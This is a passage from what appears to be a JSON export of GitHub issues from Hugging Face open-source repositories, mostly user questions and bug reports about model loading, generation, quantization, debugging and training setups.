"https://github.com/huggingface/text-generation-inference/issues/1487", "state": "closed", "labels": [], "created_at": "2024-01-25T17:11:52Z", "updated_at": "2024-01-31T16:44:32Z", "user": "tamanna-mostafa" }, { "repo": "huggingface/transformers.js", "number": 539, "title": "How can i use this Model?", "body": "### Question\n\nHow can i use this Model? https://huggingface.co/shibing624/macbert4csc-base-chinese", "url": "https://github.com/huggingface/transformers.js/issues/539", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-25T13:12:08Z", "updated_at": "2025-10-13T04:58:48Z", "user": "wfk007" }, { "repo": "huggingface/text-generation-inference", "number": 1483, "title": "how to pdb text-generation-server", "body": "### System Info\r\n\r\n```\r\n2024-01-25T09:10:08.096040Z INFO text_generation_launcher: Runtime environment:\r\nTarget: x86_64-unknown-linux-gnu\r\nCargo version: 1.70.0\r\nCommit sha: 9f18f4c00627e1a0ad696b6774e5ad7ca8f4261c\r\nDocker label: sha-9f18f4c\r\nnvidia-smi:\r\nThu Jan 25 09:10:08 2024 \r\n +---------------------------------------------------------------------------------------+\r\n | NVIDIA-SMI 535.113.01 Driver Version: 535.113.01 CUDA Version: 12.2 |\r\n |-----------------------------------------+----------------------+----------------------+\r\n | GPU Name Persistence-M | Bus-Id Disp.A | Volatile Uncorr. ECC |\r\n | Fan Temp Perf Pwr:Usage/Cap | Memory-Usage | GPU-Util Compute M. |\r\n | | | MIG M. 
|\r\n |=========================================+======================+======================|\r\n | 0 NVIDIA GeForce RTX 3090 Off | 00000000:1A:00.0 Off | N/A |\r\n | 30% 28C P8 24W / 350W | 5MiB / 24576MiB | 0% Default |\r\n | | | N/A |\r\n```\r\n\r\n### Information\r\n\r\n- [X] Docker\r\n- [ ] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [X] An officially supported command\r\n- [ ] My own modifications\r\n\r\n### Reproduction\r\n\r\nWhen i add `pdb.set_trace()` in .py of text-generation-server, text-generation-launcher repeats the following log and seems to be stuck:\r\n\r\n```\r\n2024-01-25T09:07:04.875448Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:14.894477Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:24.911704Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:34.928347Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:44.947306Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:07:54.965355Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:04.984481Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:15.004175Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:25.022317Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:35.041246Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:45.059839Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:08:55.078293Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:05.097024Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:15.117255Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:25.136635Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:35.156270Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:45.175864Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:09:55.194405Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n2024-01-25T09:10:05.214396Z INFO shard-manager: text_generation_launcher: Waiting for shard to be ready... rank=0\r\n\r\n```\r\n\r\n### Expected behavior\r\n\r\nI want to know how to debug .py of text-generation-server except logger?", "url": "https://github.com/huggingface/text-generation-inference/issues/1483", "state": "closed", "labels": [], "created_at": "2024-01-25T09:21:32Z", "updated_at": "2024-02-19T07:23:14Z", "user": "jessiewiswjc" }, { "repo": "huggingface/datasets", "number": 6614, "title": "`datasets/downloads` cleanup tool", "body": "### Feature request\r\n\r\nSplitting off https://github.com/huggingface/huggingface_hub/issues/1997 - currently `huggingface-cli delete-cache` doesn't take care of cleaning `datasets` temp files\r\n\r\ne.g. 
I discovered millions of files under the `datasets/downloads` cache, and I had to do:\r\n\r\n```\r\nsudo find /data/huggingface/datasets/downloads -type f -mtime +3 -exec rm {} \\+\r\nsudo find /data/huggingface/datasets/downloads -type d -empty -delete\r\n```\r\n \r\nCould the cleanup be integrated into `huggingface-cli`, or a different tool be provided, to keep the folders tidy and not consume inodes and space? \r\n\r\ne.g. there were tens of thousands of `.lock` files - I don't know why they never get removed - lock files should be temporary for the duration of the operation requiring the lock and not remain after the operation finished, IMHO.\r\n\r\nAlso I think one should be able to nuke `datasets/downloads` w/o hurting the cache, but I think there are some datasets that rely on files extracted under this dir - or at least they did in the past - which is very difficult to manage since one has no idea what is safe to delete and what not.\r\n\r\nThank you\r\n\r\n@Wauplin (requested to be tagged)", "url": "https://github.com/huggingface/datasets/issues/6614", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-01-24T18:52:10Z", "updated_at": "2024-01-24T18:55:09Z", "comments": 0, "user": "stas00" }, { "repo": "huggingface/transformers", "number": 28663, "title": "How to set stopping criteria in model.generate() when a certain word appears", "body": "### Feature request\n\nA stopping criterion for model.generate() that triggers when a certain word appears.\r\n\r\nThe word on which I need to stop the generation is: [/SENTENCE]\r\nBut the model doesn't generate the word itself; instead, it generates the subwords\r\n [ [/,SEN,TE,NC,E] ] \r\n\r\nThe corresponding ids from the tokenizer are \r\n( id and subword)\r\n28792 => [\r\n28748 => /\r\n28759 => SEN\r\n2654 => TE\r\n1197 => NC\r\n28793 => E]\r\n\r\nSo how can I put a condition in **StoppingCriteriaList** that stops the generation when [/SENTENCE] is found? (See the sketch below.)\n\n### Motivation\n\nSame as the feature request above.\n\n### Your contribution\n\nSame as the feature request above. 
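A minimal sketch of such a criterion (assuming batch size 1, with `tokenizer`, `model`, and `inputs` defined as usual; note that the ids produced for `[/SENTENCE]` can differ depending on preceding whitespace, so encode it the same way it appears during generation):

```python
from transformers import StoppingCriteria, StoppingCriteriaList

class StopOnSubsequence(StoppingCriteria):
    """Stop generation once the last emitted ids equal the stop sequence."""

    def __init__(self, stop_ids):
        self.stop_ids = list(stop_ids)

    def __call__(self, input_ids, scores, **kwargs):
        if input_ids.shape[1] < len(self.stop_ids):
            return False
        # Compare the tail of the running sequence against the stop ids.
        return input_ids[0, -len(self.stop_ids):].tolist() == self.stop_ids

stop_ids = tokenizer.encode("[/SENTENCE]", add_special_tokens=False)
output = model.generate(
    **inputs,
    stopping_criteria=StoppingCriteriaList([StopOnSubsequence(stop_ids)]),
)
```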
", "url": "https://github.com/huggingface/transformers/issues/28663", "state": "closed", "labels": [], "created_at": "2024-01-23T15:16:38Z", "updated_at": "2024-03-02T08:03:44Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/dataset-viewer", "number": 2333, "title": "Replace TypedDict with dataclass?", "body": "Do we want to replace the TypedDict objects with dataclasses?\r\n\r\nIf so: note that the objects we serialize should be serialized too without any change by orjson, at the price of a small overhead (15% in their example: https://github.com/ijl/orjson#dataclass)\r\n\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2333", "state": "closed", "labels": [ "good first issue", "question", "refactoring / architecture", "P2" ], "created_at": "2024-01-23T10:49:52Z", "updated_at": "2024-06-19T14:30:53Z", "user": "severo" }, { "repo": "huggingface/optimum", "number": 1664, "title": "Bitsandbytes integration in ORTModelForCausalLM.from_pretrained()", "body": "### System Info\n\n```shell\noptimum==1.17.0.dev0\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThe given code\r\n```\r\nfrom optimum.onnxruntime import ORTModelForCausalLM\r\nfrom transformers import BitsAndBytesConfig\r\nfinetuned_model_name = \"path\"\r\nimport torch\r\ncompute_dtype = getattr(torch, \"float16\")\r\nbnb_config = BitsAndBytesConfig(load_in_4bit=True,\r\n bnb_4bit_quant_type=\"nf4\",\r\n bnb_4bit_compute_dtype=compute_dtype,\r\n bnb_4bit_use_double_quant=False)\r\nort_model = ORTModelForCausalLM.from_pretrained(\r\n finetuned_model_name,\r\n use_io_binding=True,\r\n quantization_config=bnb_config,\r\n export=True,\r\n use_cache=True,\r\n from_transformers=True\r\n)\r\n```\r\nshows the errror\r\n```\r\nTypeError: _from_transformers() got an unexpected keyword argument 'quantization_config'\r\n```\r\nso how to do quantization while loading with **ORTModelForCausalLM**\n\n### Expected behavior\n\nThe given code\r\n```\r\nfrom optimum.onnxruntime import ORTModelForCausalLM\r\nfrom transformers import BitsAndBytesConfig\r\nfinetuned_model_name = \"path\"\r\nimport torch\r\ncompute_dtype = getattr(torch, \"float16\")\r\nbnb_config = BitsAndBytesConfig(load_in_4bit=True,\r\n bnb_4bit_quant_type=\"nf4\",\r\n bnb_4bit_compute_dtype=compute_dtype,\r\n bnb_4bit_use_double_quant=False)\r\nort_model = ORTModelForCausalLM.from_pretrained(\r\n finetuned_model_name,\r\n use_io_binding=True,\r\n quantization_config=bnb_config,\r\n export=True,\r\n use_cache=True,\r\n from_transformers=True\r\n)\r\n```\r\nshows the errror\r\n```\r\nTypeError: _from_transformers() got an unexpected keyword argument 'quantization_config'\r\n```\r\nso how to do quantization while loading with **ORTModelForCausalLM**", "url": "https://github.com/huggingface/optimum/issues/1664", "state": "open", "labels": [ "bug" ], "created_at": "2024-01-23T08:56:45Z", "updated_at": "2024-01-23T08:56:45Z", "comments": 0, "user": "pradeepdev-1995" }, { "repo": "huggingface/peft", "number": 1382, "title": "How to set a predefined weight for LoRA and the linear layer", "body": "Hi,\r\n\r\nThanks for your great job! 
\r\n\r\nI have a question: When adding LoRA on a linear layer, how to set a predefined weight for LoRA and the linear layer, instead of just 0.5 : 0.5 ?\r\n\r\n", "url": "https://github.com/huggingface/peft/issues/1382", "state": "closed", "labels": [], "created_at": "2024-01-22T13:24:31Z", "updated_at": "2024-02-06T08:37:49Z", "user": "quqxui" }, { "repo": "huggingface/accelerate", "number": 2367, "title": "how to prevent accelerate from concatenating tensors in batch? ", "body": "My `collate_fn` in dataloader returns a list of image tensors with different height and width. After using `accelerator.prepare(model, optimizer, dataloader)`, I noticed that accelerate seems to automatically concatenate the tensors during `for step, batch in enumerate(train_dataloader)` iteration, and the size-mismatch leads to Exceptions. \r\nIs there any parameter to prevent the auto-concatenating?\r\nOr, should I remove `dataloader` from `accelerator.prepare` params?", "url": "https://github.com/huggingface/accelerate/issues/2367", "state": "closed", "labels": [], "created_at": "2024-01-22T11:26:06Z", "updated_at": "2024-01-23T03:24:08Z", "user": "feiyangsuo" }, { "repo": "huggingface/trl", "number": 1264, "title": "How to train the model and ref_model on multiple GPUs with averaging?", "body": "For example,I have two RTX 3090 GPUs, and both the model and ref_model are 14 billion parameter models. I need to distribute these two models evenly across the two cards for training.\r\nthis is my code,but have an error:\r\n```\r\n\"\"\"\r\nCUDA_VISIBLE_DEVICES=0 python Sakura_DPO.py \\\r\n --base_model Qwen-14B-Chat \\\r\n --ref_model Qwen-14B-Chat \\\r\n --data-path distilabel-intel-orca-dpo-pairs.json \\\r\n --output_dir distilabel-intel-orca-dpo-pairs \\\r\n --num_epochs 1 \\\r\n --batch_size 16 \\\r\n --micro_batch_size 1 \\\r\n --learning_rate 1e-6 \\\r\n --lora_r 32 \\\r\n --lora_alpha 32 \\\r\n --lora_dropout 0.05 \\\r\n --lr_scheduler 'cosine' \\\r\n --warmup_ratio 0.1 \\\r\n --cutoff_len 768\r\n##########################\r\ntransformers\r\nbitsandbytes\r\nevaluate\r\npeft\r\ntransformers_stream_generator\r\ntiktoken\r\nfire\r\ntrl\r\naccelerate\r\ndeepspeed\r\n\"\"\"\r\nimport os\r\nimport sys\r\nfrom typing import List\r\n\r\nimport fire\r\nimport torch\r\nimport transformers\r\n#import kosy_transformers\r\nfrom datasets import load_dataset, Dataset\r\n\r\nfrom transformers import TrainerCallback, TrainingArguments, TrainerState, TrainerControl\r\nfrom transformers.trainer_utils import PREFIX_CHECKPOINT_DIR\r\nfrom torch.nn import functional as F\r\n\r\nfrom peft import (\r\n LoraConfig,\r\n get_peft_model,\r\n prepare_model_for_kbit_training,\r\n set_peft_model_state_dict\r\n)\r\n\r\nfrom transformers import LlamaForCausalLM, LlamaTokenizer\r\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig\r\nfrom trl import DPOTrainer\r\nimport bitsandbytes as bnb\r\n#torch.autograd.set_detect_anomaly(True)\r\ndef find_all_linear_names(model):\r\n #cls = bnb.nn.Linear8bitLt \r\n cls = bnb.nn.Linear4bit \r\n lora_module_names = set()\r\n for name, module in model.named_modules():\r\n if isinstance(module, cls):\r\n names = name.split('.')\r\n lora_module_names.add(names[0] if len(names) == 1 else names[-1])\r\n\r\n\r\n if 'lm_head' in lora_module_names: # needed for 16-bit\r\n lora_module_names.remove('lm_head')\r\n return list(lora_module_names)\r\n#os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\r\nfrom accelerate import Accelerator\r\nfrom accelerate import PartialState\r\ndef 
train(\r\n # model/data params\r\n base_model: str = \"\", \r\n ref_model: str = \"None\", \r\n data_path: str = \"\",\r\n output_dir: str = \"\",\r\n # training hyperparams\r\n batch_size: int = 128,\r\n micro_batch_size: int = 8,\r\n num_epochs: int = 1,\r\n learning_rate: float = 3e-4,\r\n cutoff_len: int = 4096,\r\n val_set_size: int = 0,\r\n lr_scheduler: str = \"cosine\",\r\n warmup_ratio: float = 0.1, \r\n # lora hyperparams\r\n lora_r: int = 16,\r\n lora_alpha: int = 16,\r\n lora_dropout: float = 0.05,\r\n # from peft docs: [\"q_proj\", \"k_proj\", \"v_proj\", \"o_proj\", \"fc_in\", \"fc_out\", \"wte\", \"gate_proj\", \"down_proj\", \"up_proj\"]\r\n lora_target_modules: List[str] = [\"gate_proj\", \"down_proj\", \"up_proj\"],\r\n # llm hyperparams\r\n train_on_inputs: bool = False, # if False, masks out inputs in loss\r\n add_eos_token: bool = False,\r\n group_by_length: bool = False, # faster, but produces an odd training loss curve\r\n gradient_checkpointing: bool = True,\r\n # wandb params\r\n #wandb_project: str = \"\",\r\n #wandb_run_name: str = \"\",\r\n #wandb_watch: str = \"\", # options: false | gradients | all\r\n #wandb_log_model: str = \"\", # options: false | true\r\n resume_from_checkpoint: str = None, # either training checkpoint or final adapter\r\n prompt_template_name: str = \"alpaca\",\r\n # NEFTune params\r\n noise_alpha: int = 5\r\n):\r\n if int(os.environ.get(\"LOCAL_RANK\", 0)) == 0:\r\n print(\r\n f\"Params using prompt template {prompt_template_name}:\\n\"\r\n f\"base_model: {base_model}\\n\"\r\n f\"ref_model: {ref_model}\\n\"\r\n f\"data_path: {data_path}\\n\"\r\n f\"output_dir: {output_dir}\\n\"\r\n f\"batch_size: {batch_size}\\n\"\r\n f\"micro_batch_size: {micro_batch_size}\\n\"\r\n f\"num_epochs: {num_epochs}\\n\"\r\n f\"learning_rate: {learning_rate}\\n\"\r\n f\"cutoff_len: {cutoff_len}\\n\"\r\n f\"val_set_size: {val_set_size}\\n\"\r\n f\"lr_scheduler: {lr_scheduler}\\n\"\r\n f\"warmup_ratio: {warmup_ratio}\\n\"\r\n f\"lora_r: {lora_r}\\n\"\r\n f\"lora_alpha: {lora_alpha}\\n\"\r\n f\"lora_dropout: {lora_dropout}\\n\"\r\n f\"lora_target_modules: {lora_target_modules}\\n\"\r\n f\"train_on_inputs: {train_on_inputs}\\n\"\r\n f\"add_eos_token: {add_eos_token}\\n\"\r\n f\"group_by_length: {group_by_length}\\n\"\r\n f\"gradient_checkpointing: {gradient_checkpointing}\\n\"\r\n #f\"wandb_project: {wandb_project}\\n\"\r\n #f\"wandb_run_name: {wandb_run_name}\\n\"\r\n #f\"wandb_watch: {wandb_watch}\\n\"\r\n #f\"wandb_log_model: {wandb_log_model}\\n\"\r\n f\"resume_from_checkpoint: {resume_from_checkpoint or False}\\n\"\r\n )\r\n assert (\r\n base_model\r\n ), \"Please spe", "url": "https://github.com/huggingface/trl/issues/1264", "state": "closed", "labels": [], "created_at": "2024-01-22T07:54:18Z", "updated_at": "2024-08-27T16:08:49Z", "user": "Minami-su" }, { "repo": "huggingface/transformers.js", "number": 528, "title": "Preloading / Lazy loading model before generate requested", "body": "### Question\n\nHi @xenova \r\n\r\nI've been looking around for this type of functionality for ages and didn't realize you had this type of front-end inferencing locked down in such awesome fashion on browsers. Brilliant!!!\r\n\r\nIn the demo at https://xenova.github.io/transformers.js/, the model is loaded one-time when sending the first request/inference. 
\r\n\r\nI want to pre-load a model in the background when a user opens the page, but not sure on the whether there is a method in your API for https://cdn.jsdelivr.net/npm/@xenova/transformers@2.14.0, or whether model loading is purely contingent on a first inference.\r\n\r\nI've checked your API link: https://huggingface.co/docs/transformers.js/api/env, and nothing there that I can see so I'm assuming it requires a first run.\r\n\r\nIf it requires a first-run I can think of a couple workarounds, but wanted to check with you before heading down that rabbit hole.\r\n\r\nCheers", "url": "https://github.com/huggingface/transformers.js/issues/528", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-20T23:09:13Z", "updated_at": "2024-01-29T23:23:44Z", "user": "gidzr" }, { "repo": "huggingface/sentence-transformers", "number": 2429, "title": "How to additional special tokens using CrossEncoder?", "body": "I am using cross encoder.\r\n\r\nI would like add a new special token (e.g., '[EOT]') on top of the pre-trained model & tokenizer (e.g., 'bert-base-uncased'). \r\n\r\nI am wondering what is the best way to do it? ", "url": "https://github.com/huggingface/sentence-transformers/issues/2429", "state": "open", "labels": [], "created_at": "2024-01-20T15:52:39Z", "updated_at": "2024-01-20T16:25:00Z", "user": "mucun1988" }, { "repo": "huggingface/optimum", "number": 1658, "title": "TextStreamer not supported for ORTCausalLM?", "body": "### System Info\r\n\r\n```shell\r\nSystem: IBM Power10\r\n`5.14.0-362.13.1.el9_3.ppc64le`\r\n\r\nOS: RHEL 9.3\r\n\r\nFramework versions:\r\noptimum==1.16.2\r\ntransformers==4.36.2\r\ntorch==2.0.1\r\nonnx==1.13.1\r\nonnxruntime==1.15.1\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@JingyaHuang @echarlaix \r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [x] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [x] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nThis is a minimal repoducable example based on the official huggingface streamer example:\r\n\r\nhttps://huggingface.co/docs/transformers/internal/generation_utils#transformers.TextStreamer.example\r\n\r\nI exported the model before using `optimum-cli`:\r\n\r\n`optimum-cli export onnx --model TinyLlama/TinyLlama-1.1B-Chat-v1.0 /data/LLMs/onnx/tinyllama_onnx/`\r\n\r\n```python\r\nfrom transformers import AutoTokenizer, TextStreamer\r\nfrom optimum.onnxruntime import ORTModelForCausalLM\r\n\r\nmodel_id = \"/data/LLMs/onnx/tinyllama_onnx\"\r\ntokenizer = AutoTokenizer.from_pretrained(model_id, padding_side=\"left\")\r\ntokenizer.pad_token = tokenizer.eos_token\r\n\r\nmodel = ORTModelForCausalLM.from_pretrained(model_id, use_cache=True, use_merged=False, use_io_binding=False)\r\ntext = \"My name is William and I live in\"\r\n\r\ninp = tokenizer(text, return_tensors=\"pt\", padding=True)\r\nstreamer = TextStreamer(inp)\r\n_ = model.generate(**inp, streamer=streamer, max_new_tokens=256)\r\n```\r\n\r\nError Message:\r\n\r\n```python\r\nSetting `pad_token_id` to `eos_token_id`:2 for open-end generation.\r\n---------------------------------------------------------------------------\r\nKeyError Traceback (most recent call last)\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/transformers/tokenization_utils_base.py:266, in BatchEncoding.__getattr__(self, item)\r\n 265 try:\r\n--> 266 return self.data[item]\r\n 267 except 
KeyError:\r\n\r\nKeyError: 'decode'\r\n\r\nDuring handling of the above exception, another exception occurred:\r\n\r\nAttributeError Traceback (most recent call last)\r\nCell In[7], line 5\r\n 3 inp = tokenizer(text, return_tensors=\"pt\", padding=True)\r\n 4 streamer = TextStreamer(inp)\r\n----> 5 _ = model.generate(**inp, streamer=streamer, max_new_tokens=256)\r\n\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/torch/utils/_contextlib.py:115, in context_decorator..decorate_context(*args, **kwargs)\r\n 112 @functools.wraps(func)\r\n 113 def decorate_context(*args, **kwargs):\r\n 114 with ctx_factory():\r\n--> 115 return func(*args, **kwargs)\r\n\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/transformers/generation/utils.py:1611, in GenerationMixin.generate(self, inputs, generation_config, logits_processor, stopping_criteria, prefix_allowed_tokens_fn, synced_gpus, assistant_model, streamer, negative_prompt_ids, negative_prompt_attention_mask, **kwargs)\r\n 1608 input_ids = inputs_tensor if model_input_name == \"input_ids\" else model_kwargs.pop(\"input_ids\")\r\n 1610 if streamer is not None:\r\n-> 1611 streamer.put(input_ids.cpu())\r\n 1613 # 6. Prepare `max_length` depending on other stopping criteria.\r\n 1614 input_ids_length = input_ids.shape[-1]\r\n\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/transformers/generation/streamers.py:97, in TextStreamer.put(self, value)\r\n 95 # Add the new token to the cache and decodes the entire thing.\r\n 96 self.token_cache.extend(value.tolist())\r\n---> 97 text = self.tokenizer.decode(self.token_cache, **self.decode_kwargs)\r\n 99 # After the symbol for a new line, we flush the cache.\r\n 100 if text.endswith(\"\\n\"):\r\n\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/transformers/tokenization_utils_base.py:268, in BatchEncoding.__getattr__(self, item)\r\n 266 return self.data[item]\r\n 267 except KeyError:\r\n--> 268 raise AttributeError\r\n\r\nAttributeError: \r\n```\r\n\r\n### Expected behavior\r\n\r\nI would expect a streaming of tokens instead of waiting for the whole text to be processed/generated upfront :) ", "url": "https://github.com/huggingface/optimum/issues/1658", "state": "closed", "labels": [ "bug" ], "created_at": "2024-01-20T11:50:11Z", "updated_at": "2024-01-29T12:28:40Z", "comments": 1, "user": "mgiessing" }, { "repo": "huggingface/optimum", "number": 1657, "title": "Clarity on the convert.py for a model to ONNX.py.. documentation issue", "body": "### Feature request\n\nI need some help understanding how this script is supposed to be run / implemented?\r\n\r\nhttps://github.com/huggingface/optimum/blob/main/optimum/exporters/onnx/convert.py\r\n\r\nQuestions:\r\n1. is this already included when I pip install optimum? .. which is implemented using the instructions at:\r\nhttps://huggingface.co/docs/optimum/onnxruntime/usage_guides/quantization#quantizing-a-model-to-be-used-with-optimums-cli\r\n2. or is it the script that's called on from the modal.save when inferencing/calling onnx model?\r\n3. 
or is this a separate script that can be called independently like the convert.py that xenova has?\r\n\r\nAlso, in order to run the optimum/exporters/onnx/convert.py script, do I need to download the full exporters folder, just the onnx folder, or can I just copy-paste the script and run that indepdently?\r\n\r\nMuch appreciated\n\n### Motivation\n\nDeeper understanding to use the resources in this github\n\n### Your contribution\n\nNone", "url": "https://github.com/huggingface/optimum/issues/1657", "state": "closed", "labels": [], "created_at": "2024-01-20T04:59:10Z", "updated_at": "2024-02-07T04:13:20Z", "comments": 2, "user": "gidzr" }, { "repo": "huggingface/candle", "number": 1608, "title": "How to keep the model loaded in memory?", "body": "Hi guys,\r\n\r\nI'm trying to setup a local instance of Phi-2 to use it as an autocomplete provider for my text editor.\r\n\r\nThe problem that I have is that each time I call the command to complete a text, the files have to be retrieved and the model loaded - which is a lot of time wasted for real time autocompletion.\r\n\r\n`/.../candle/target/release/examples$ ./phi --model 2 --quantized --sample-len 12 --prompt \"$(cat text-to-complete.md)\"`\r\n\r\n\tavx: false, neon: true, simd128: false, f16c: false\r\n\ttemp: 0.00 repeat-penalty: 1.10 repeat-last-n: 64\r\n\tretrieved the files in 455.042\u00b5s\r\n\tloaded the model in 2.127639167s\r\n\tstarting the inference loop\r\n\t# The World History\r\n\r\n\tHave you ever wondered how people lived in the past? ...\r\n\r\nDo you know how to keep the model loaded in memory?\r\nLike... Is there a possibility to start a server accepting post requests with prompts to complete - or something like this?\r\n\r\nThanks", "url": "https://github.com/huggingface/candle/issues/1608", "state": "open", "labels": [], "created_at": "2024-01-19T19:16:54Z", "updated_at": "2024-01-20T00:27:22Z", "user": "tdkbzh" }, { "repo": "huggingface/peft", "number": 1374, "title": "How to activate, and keep frozen, multiple adapters?", "body": "Hello all,\r\n\r\nI have been working on multiple adapters and part of my project requires that I activate all the loaded adapters. However, they must be frozen. I am running this code:\r\n\r\n```python\r\nadapters_items = iter(tqdm.tqdm(adapters.items()))\r\nfirst_item = next(adapters_items)\r\nmodel_peft = PeftModel.from_pretrained(model, first_item[1], first_item[0], is_trainable=False)\r\n\r\nfor adapter_name, model_id in adapters_items:\r\n model_peft.load_adapter(model_id, adapter_name, is_trainable=False)\r\n\r\nmodel_peft.base_model.set_adapter(list(adapters.keys()))\r\n```\r\n\r\nAfter some debugging, I see that the adapters are frozen (requires_grad=False) until the last line where I set the active adapters. 
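One workaround (a sketch, not an official PEFT API; `model_peft` and `adapters` as in the snippet above) is to re-freeze the LoRA weights immediately after activating them:

```python
# Activate all adapters; as described below, this flips requires_grad to True.
model_peft.base_model.set_adapter(list(adapters.keys()))

# Re-freeze every LoRA parameter right after activation.
for name, param in model_peft.named_parameters():
    if "lora_" in name:
        param.requires_grad = False
```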
After they are set to be active, requires_grad=True.\r\n\r\nI see that `set_adapter` calls this function on all the LoraLayers, and how it sets the adapters to trainable.\r\n> https://github.com/huggingface/peft/blob/ebbff4023ad276cbcb2466fd7e99be7d3ae0ae11/src/peft/tuners/tuners_utils.py#L464-L484\r\n\r\nHow can I set the active adapter(s) while keeping them frozen?", "url": "https://github.com/huggingface/peft/issues/1374", "state": "closed", "labels": [], "created_at": "2024-01-19T11:28:15Z", "updated_at": "2024-02-07T11:13:24Z", "user": "EricLBuehler" }, { "repo": "huggingface/text-generation-inference", "number": 1457, "title": "How to use a finetuned model from my local directory ", "body": "### System Info\r\n\r\ntext-generation 0.6.1\r\n\r\n### Information\r\n\r\n- [ ] Docker\r\n- [X] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [X] An officially supported command\r\n- [ ] My own modifications\r\n\r\n### Reproduction\r\n\r\n```\r\nfrom text_generation import InferenceAPIClient\r\nclient = InferenceAPIClient( \"/mylocalpath/finetunedmodel\")\r\ntest_prompt = \"\"\"sample prompt\"\"\"\r\ntext = client.generate(test_prompt).generated_text\r\nprint(text)\r\n```\r\nit showing the\r\n```\r\nNotFoundError: Model \"/mylocalpath/finetunedmodel\" does not exist\r\n```\r\nThis finetuned model is tuned in the base model - Mistral\r\n\r\n### Expected behavior\r\n\r\nExpect to load the finetuned model from the local path", "url": "https://github.com/huggingface/text-generation-inference/issues/1457", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-01-19T06:18:41Z", "updated_at": "2024-03-10T01:45:51Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/transformers", "number": 28598, "title": "what is the correct format of input when fine-tuning GPT2 for text generation with batch input? ", "body": "### System Info\r\n\r\n- `transformers` version: 4.33.0\r\n- Platform: Windows-10-10.0.19045-SP0\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.3\r\n- Accelerate version: 0.22.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1+cpu (False)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n\r\n### Who can help?\r\n\r\n@ArthurZucker \r\n @younesbelkada\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nI want to fine-tune GPT2 for text generation with batch input. And I use follow code to format batch input:\r\n```python\r\nfrom transformers import GPT2LMHeadModel, GPT2Tokenizer\r\n\r\ntokenizer = GPT2Tokenizer.from_pretrained(r'E:\\pythonWork\\models\\gpt2')\r\nmax_length = 8\r\ndatas = [\r\n \"The dog.\",\r\n \"The cute dog.\",\r\n]\r\nmodel_input = tokenizer(datas)\r\nprint('original input:\\n', model_input)\r\n\r\n# prepare for batch input\r\n# I add bos token at the start and eos token at the end, and add pad token at the right to pad the sentences to the \r\n# same length. bos_token_id=eos_token_id=50256, and there is not a pad token, so i also use 50256 as pad token. 
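# Note: reusing 50256 (GPT2's eos) as the pad id is the usual workaround,
# since the pretrained GPT2 vocab has no dedicated pad token; the
# attention_mask zeros and the -100 labels built below are what keep the
# padded positions out of attention and out of the loss.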
